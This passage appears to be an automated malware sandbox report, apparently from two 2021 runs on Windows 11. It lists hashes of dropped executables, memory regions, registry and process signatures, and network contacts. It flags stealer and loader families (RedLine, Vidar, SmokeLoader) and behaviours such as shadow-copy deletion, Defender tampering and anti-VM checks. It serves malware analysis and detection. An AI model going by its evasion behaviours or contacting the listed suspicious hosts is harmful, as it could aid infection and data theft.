| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\tagR_GHtIRsJS5siarvoMNbq.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe
| MD5 | a70224fc6784c169edde4878b21e6a3b |
| SHA1 | 7a3cf5acb7434ae42d906ec67e3a477bad363b8c |
| SHA256 | 83ca077db9015297ea5c26b515e42ce340c88a944359335ed3cdb7f8184d8a2f |
| SHA512 | 6fbf4429cb8a3f6e7b84fad70ba960b17db2e8b0c273e4303471f64b0b8fc171bab9254d815b4b57e528854f88a74e959a389f065128cf185889a1f570b0813f |
C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe
| MD5 | be5ac1debc50077d6c314867ea3129af |
| SHA1 | 2de0add69b7742fe3e844f940464a9f965b6e68f |
| SHA256 | 577643f523646cd00dedf577aeb5848405cc29518cabb4dec9ca6bcb316f9abd |
| SHA512 | 7ff22965ddce1830fbf9b05bcf19da894378f73d423c591d45397d952729ee1d0d816fd2e87e91269f6969849ecb94ab8b86f3933fd723a9e2cdea024958c324 |
memory/1992-235-0x000000001BC90000-0x000000001BC92000-memory.dmp
memory/1200-244-0x0000000005650000-0x0000000005651000-memory.dmp
memory/1944-248-0x0000000004890000-0x00000000048BF000-memory.dmp
memory/1288-249-0x00000000056E0000-0x0000000005C86000-memory.dmp
memory/1712-255-0x0000000004CA0000-0x0000000004CA1000-memory.dmp
memory/1712-250-0x0000000002320000-0x0000000002321000-memory.dmp
memory/1932-257-0x0000000000F30000-0x0000000000F32000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA1 | 568571b12ca44a585df589dc810bf53adf5e8050 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
| SHA512 | ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c |
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA1 | 568571b12ca44a585df589dc810bf53adf5e8050 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
| SHA512 | ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c |
memory/4120-247-0x0000000000000000-mapping.dmp
memory/1820-258-0x00000000059C0000-0x00000000059C1000-memory.dmp
memory/4076-256-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | a3ec5ee946f7b93287ba9cf7facc6647 |
| SHA1 | 3595b700f8e41d45d8a8d15b42cd00cc19922647 |
| SHA256 | 5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0 |
| SHA512 | 63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6 |
memory/4076-262-0x00000000006E0000-0x00000000006E3000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | a3ec5ee946f7b93287ba9cf7facc6647 |
| SHA1 | 3595b700f8e41d45d8a8d15b42cd00cc19922647 |
| SHA256 | 5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0 |
| SHA512 | 63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6 |
memory/4576-259-0x0000000000000000-mapping.dmp
memory/1200-263-0x00000000055D0000-0x0000000005646000-memory.dmp
memory/1668-267-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 9499dac59e041d057327078ccada8329 |
| SHA1 | 707088977b09835d2407f91f4f6dbe4a4c8f2fff |
| SHA256 | ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9 |
| SHA512 | 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397 |
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 9499dac59e041d057327078ccada8329 |
| SHA1 | 707088977b09835d2407f91f4f6dbe4a4c8f2fff |
| SHA256 | ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9 |
| SHA512 | 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397 |
memory/1196-273-0x0000000000480000-0x0000000000481000-memory.dmp
memory/2832-265-0x0000000000000000-mapping.dmp
memory/2084-274-0x0000000000300000-0x0000000000301000-memory.dmp
memory/4728-280-0x0000000000000000-mapping.dmp
memory/1992-283-0x0000000003000000-0x000000000301B000-memory.dmp
memory/3248-282-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/3828-287-0x0000000000000000-mapping.dmp
memory/1668-292-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/1668-286-0x0000000005860000-0x0000000005861000-memory.dmp
memory/1500-285-0x0000000000660000-0x0000000000661000-memory.dmp
memory/1668-281-0x0000000005F90000-0x0000000005F91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/1992-305-0x00000000031E0000-0x00000000031E1000-memory.dmp
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1668-295-0x00000000058C0000-0x00000000058C1000-memory.dmp
memory/3248-294-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1992-300-0x000000001E040000-0x000000001E041000-memory.dmp
memory/1196-299-0x0000000005320000-0x0000000005321000-memory.dmp
C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1492-313-0x0000000003F70000-0x0000000003F7A000-memory.dmp
memory/2300-317-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1064-316-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4524-318-0x0000000000000000-mapping.dmp
memory/668-312-0x0000000000000000-mapping.dmp
memory/2300-311-0x0000000000000000-mapping.dmp
memory/1064-310-0x0000000000000000-mapping.dmp
memory/1992-309-0x000000001BC10000-0x000000001BC11000-memory.dmp
memory/1196-319-0x0000000005200000-0x0000000005201000-memory.dmp
memory/2188-327-0x0000000003F80000-0x0000000003F99000-memory.dmp
memory/1536-333-0x0000000000000000-mapping.dmp
memory/1556-336-0x00000000026E0000-0x0000000002710000-memory.dmp
memory/4748-335-0x0000000000000000-mapping.dmp
memory/3184-326-0x0000000000000000-mapping.dmp
memory/2488-325-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/2084-343-0x0000000005760000-0x0000000005761000-memory.dmp
memory/2488-337-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3988-354-0x0000000000000000-mapping.dmp
memory/1500-351-0x0000000005810000-0x0000000005811000-memory.dmp
memory/1100-348-0x0000000004140000-0x00000000041DD000-memory.dmp
memory/2832-361-0x000001A3F08B0000-0x000001A3F091F000-memory.dmp
memory/4524-358-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/2360-365-0x0000000003F80000-0x0000000003FB0000-memory.dmp
memory/3696-374-0x0000000000000000-mapping.dmp
memory/3184-371-0x00000000057C0000-0x0000000005DD8000-memory.dmp
memory/1632-367-0x0000000003F70000-0x0000000003F79000-memory.dmp
memory/1668-375-0x0000000005960000-0x0000000005961000-memory.dmp
memory/2300-378-0x00000000053A0000-0x0000000005946000-memory.dmp
memory/4524-386-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/1276-382-0x0000000004270000-0x0000000004375000-memory.dmp
memory/1428-393-0x0000000000000000-mapping.dmp
memory/3988-392-0x000000001BAF0000-0x000000001BAF2000-memory.dmp
memory/3208-389-0x0000000004A40000-0x0000000004A56000-memory.dmp
memory/4932-388-0x0000000000000000-mapping.dmp
memory/2376-394-0x00000000025F0000-0x000000000261F000-memory.dmp
memory/4524-398-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3396-400-0x0000000000000000-mapping.dmp
memory/2904-396-0x0000000000000000-mapping.dmp
memory/4524-401-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/4524-404-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/4524-408-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/4524-406-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/4524-412-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/1992-419-0x000000001BC92000-0x000000001BC94000-memory.dmp
memory/4524-410-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/4524-421-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/1564-415-0x0000000000000000-mapping.dmp
memory/2160-426-0x0000000004A60000-0x0000000005386000-memory.dmp
memory/4524-429-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/1992-433-0x000000001BC94000-0x000000001BC95000-memory.dmp
memory/4524-431-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/4524-434-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/4932-435-0x0000000005410000-0x0000000005A28000-memory.dmp
memory/4524-437-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/4524-441-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/4524-443-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/4524-446-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/4524-449-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/4524-455-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/2832-458-0x000001A3F0920000-0x000001A3F09EF000-memory.dmp
memory/4576-463-0x0000000000000000-mapping.dmp
memory/3396-468-0x0000000005740000-0x0000000005741000-memory.dmp
memory/1600-465-0x0000000000000000-mapping.dmp
memory/3572-471-0x0000000000000000-mapping.dmp
memory/1428-470-0x00000000054E0000-0x00000000054E1000-memory.dmp
memory/1480-475-0x0000000000000000-mapping.dmp
memory/4232-482-0x0000000000000000-mapping.dmp
memory/4932-483-0x000000007F820000-0x000000007F821000-memory.dmp
memory/1480-485-0x0000000003200000-0x0000000003201000-memory.dmp
memory/3572-487-0x0000000005910000-0x0000000005911000-memory.dmp
memory/3348-494-0x0000000000000000-mapping.dmp
memory/4256-492-0x0000000000000000-mapping.dmp
memory/488-497-0x0000000000000000-mapping.dmp
memory/5244-504-0x0000000000000000-mapping.dmp
memory/1480-503-0x0000000005210000-0x00000000052E0000-memory.dmp
memory/5140-502-0x0000000000000000-mapping.dmp
memory/5424-509-0x0000000000000000-mapping.dmp
memory/5384-508-0x0000000000000000-mapping.dmp
memory/5140-514-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5384-520-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5676-522-0x0000000000000000-mapping.dmp
memory/5424-528-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5844-527-0x0000000000000000-mapping.dmp
memory/1480-524-0x00000000053A0000-0x0000000005454000-memory.dmp
memory/5824-526-0x0000000000000000-mapping.dmp
memory/6020-535-0x0000000000000000-mapping.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
219s
Max time network
1603s
Command Line
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4664 created 4424 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4664 wrote to memory of 4424 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
| PID 4664 wrote to memory of 4424 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (30).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (30).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4424 -ip 4424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1584
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
Network
| Country | Destination | Domain | Proto |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | N/A | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 52.178.17.2:443 | N/A | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 37.0.8.235:80 | N/A | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 37.0.11.8:80 | N/A | tcp |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 127.0.0.1:5985 | N/A | tcp |
Files
memory/4408-147-0x0000025C34500000-0x0000025C34510000-memory.dmp
memory/4408-146-0x0000025C34480000-0x0000025C34490000-memory.dmp
memory/4408-148-0x0000025C36B00000-0x0000025C36B04000-memory.dmp
memory/4408-149-0x0000025C36DF0000-0x0000025C36DF4000-memory.dmp
memory/4408-150-0x0000025C36DB0000-0x0000025C36DB1000-memory.dmp
memory/4408-151-0x0000025C36B30000-0x0000025C36B34000-memory.dmp
memory/4408-152-0x0000025C36B20000-0x0000025C36B21000-memory.dmp
memory/4408-153-0x0000025C36B20000-0x0000025C36B24000-memory.dmp
memory/4408-154-0x0000025C36A00000-0x0000025C36A01000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
244s
Max time network
1810s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
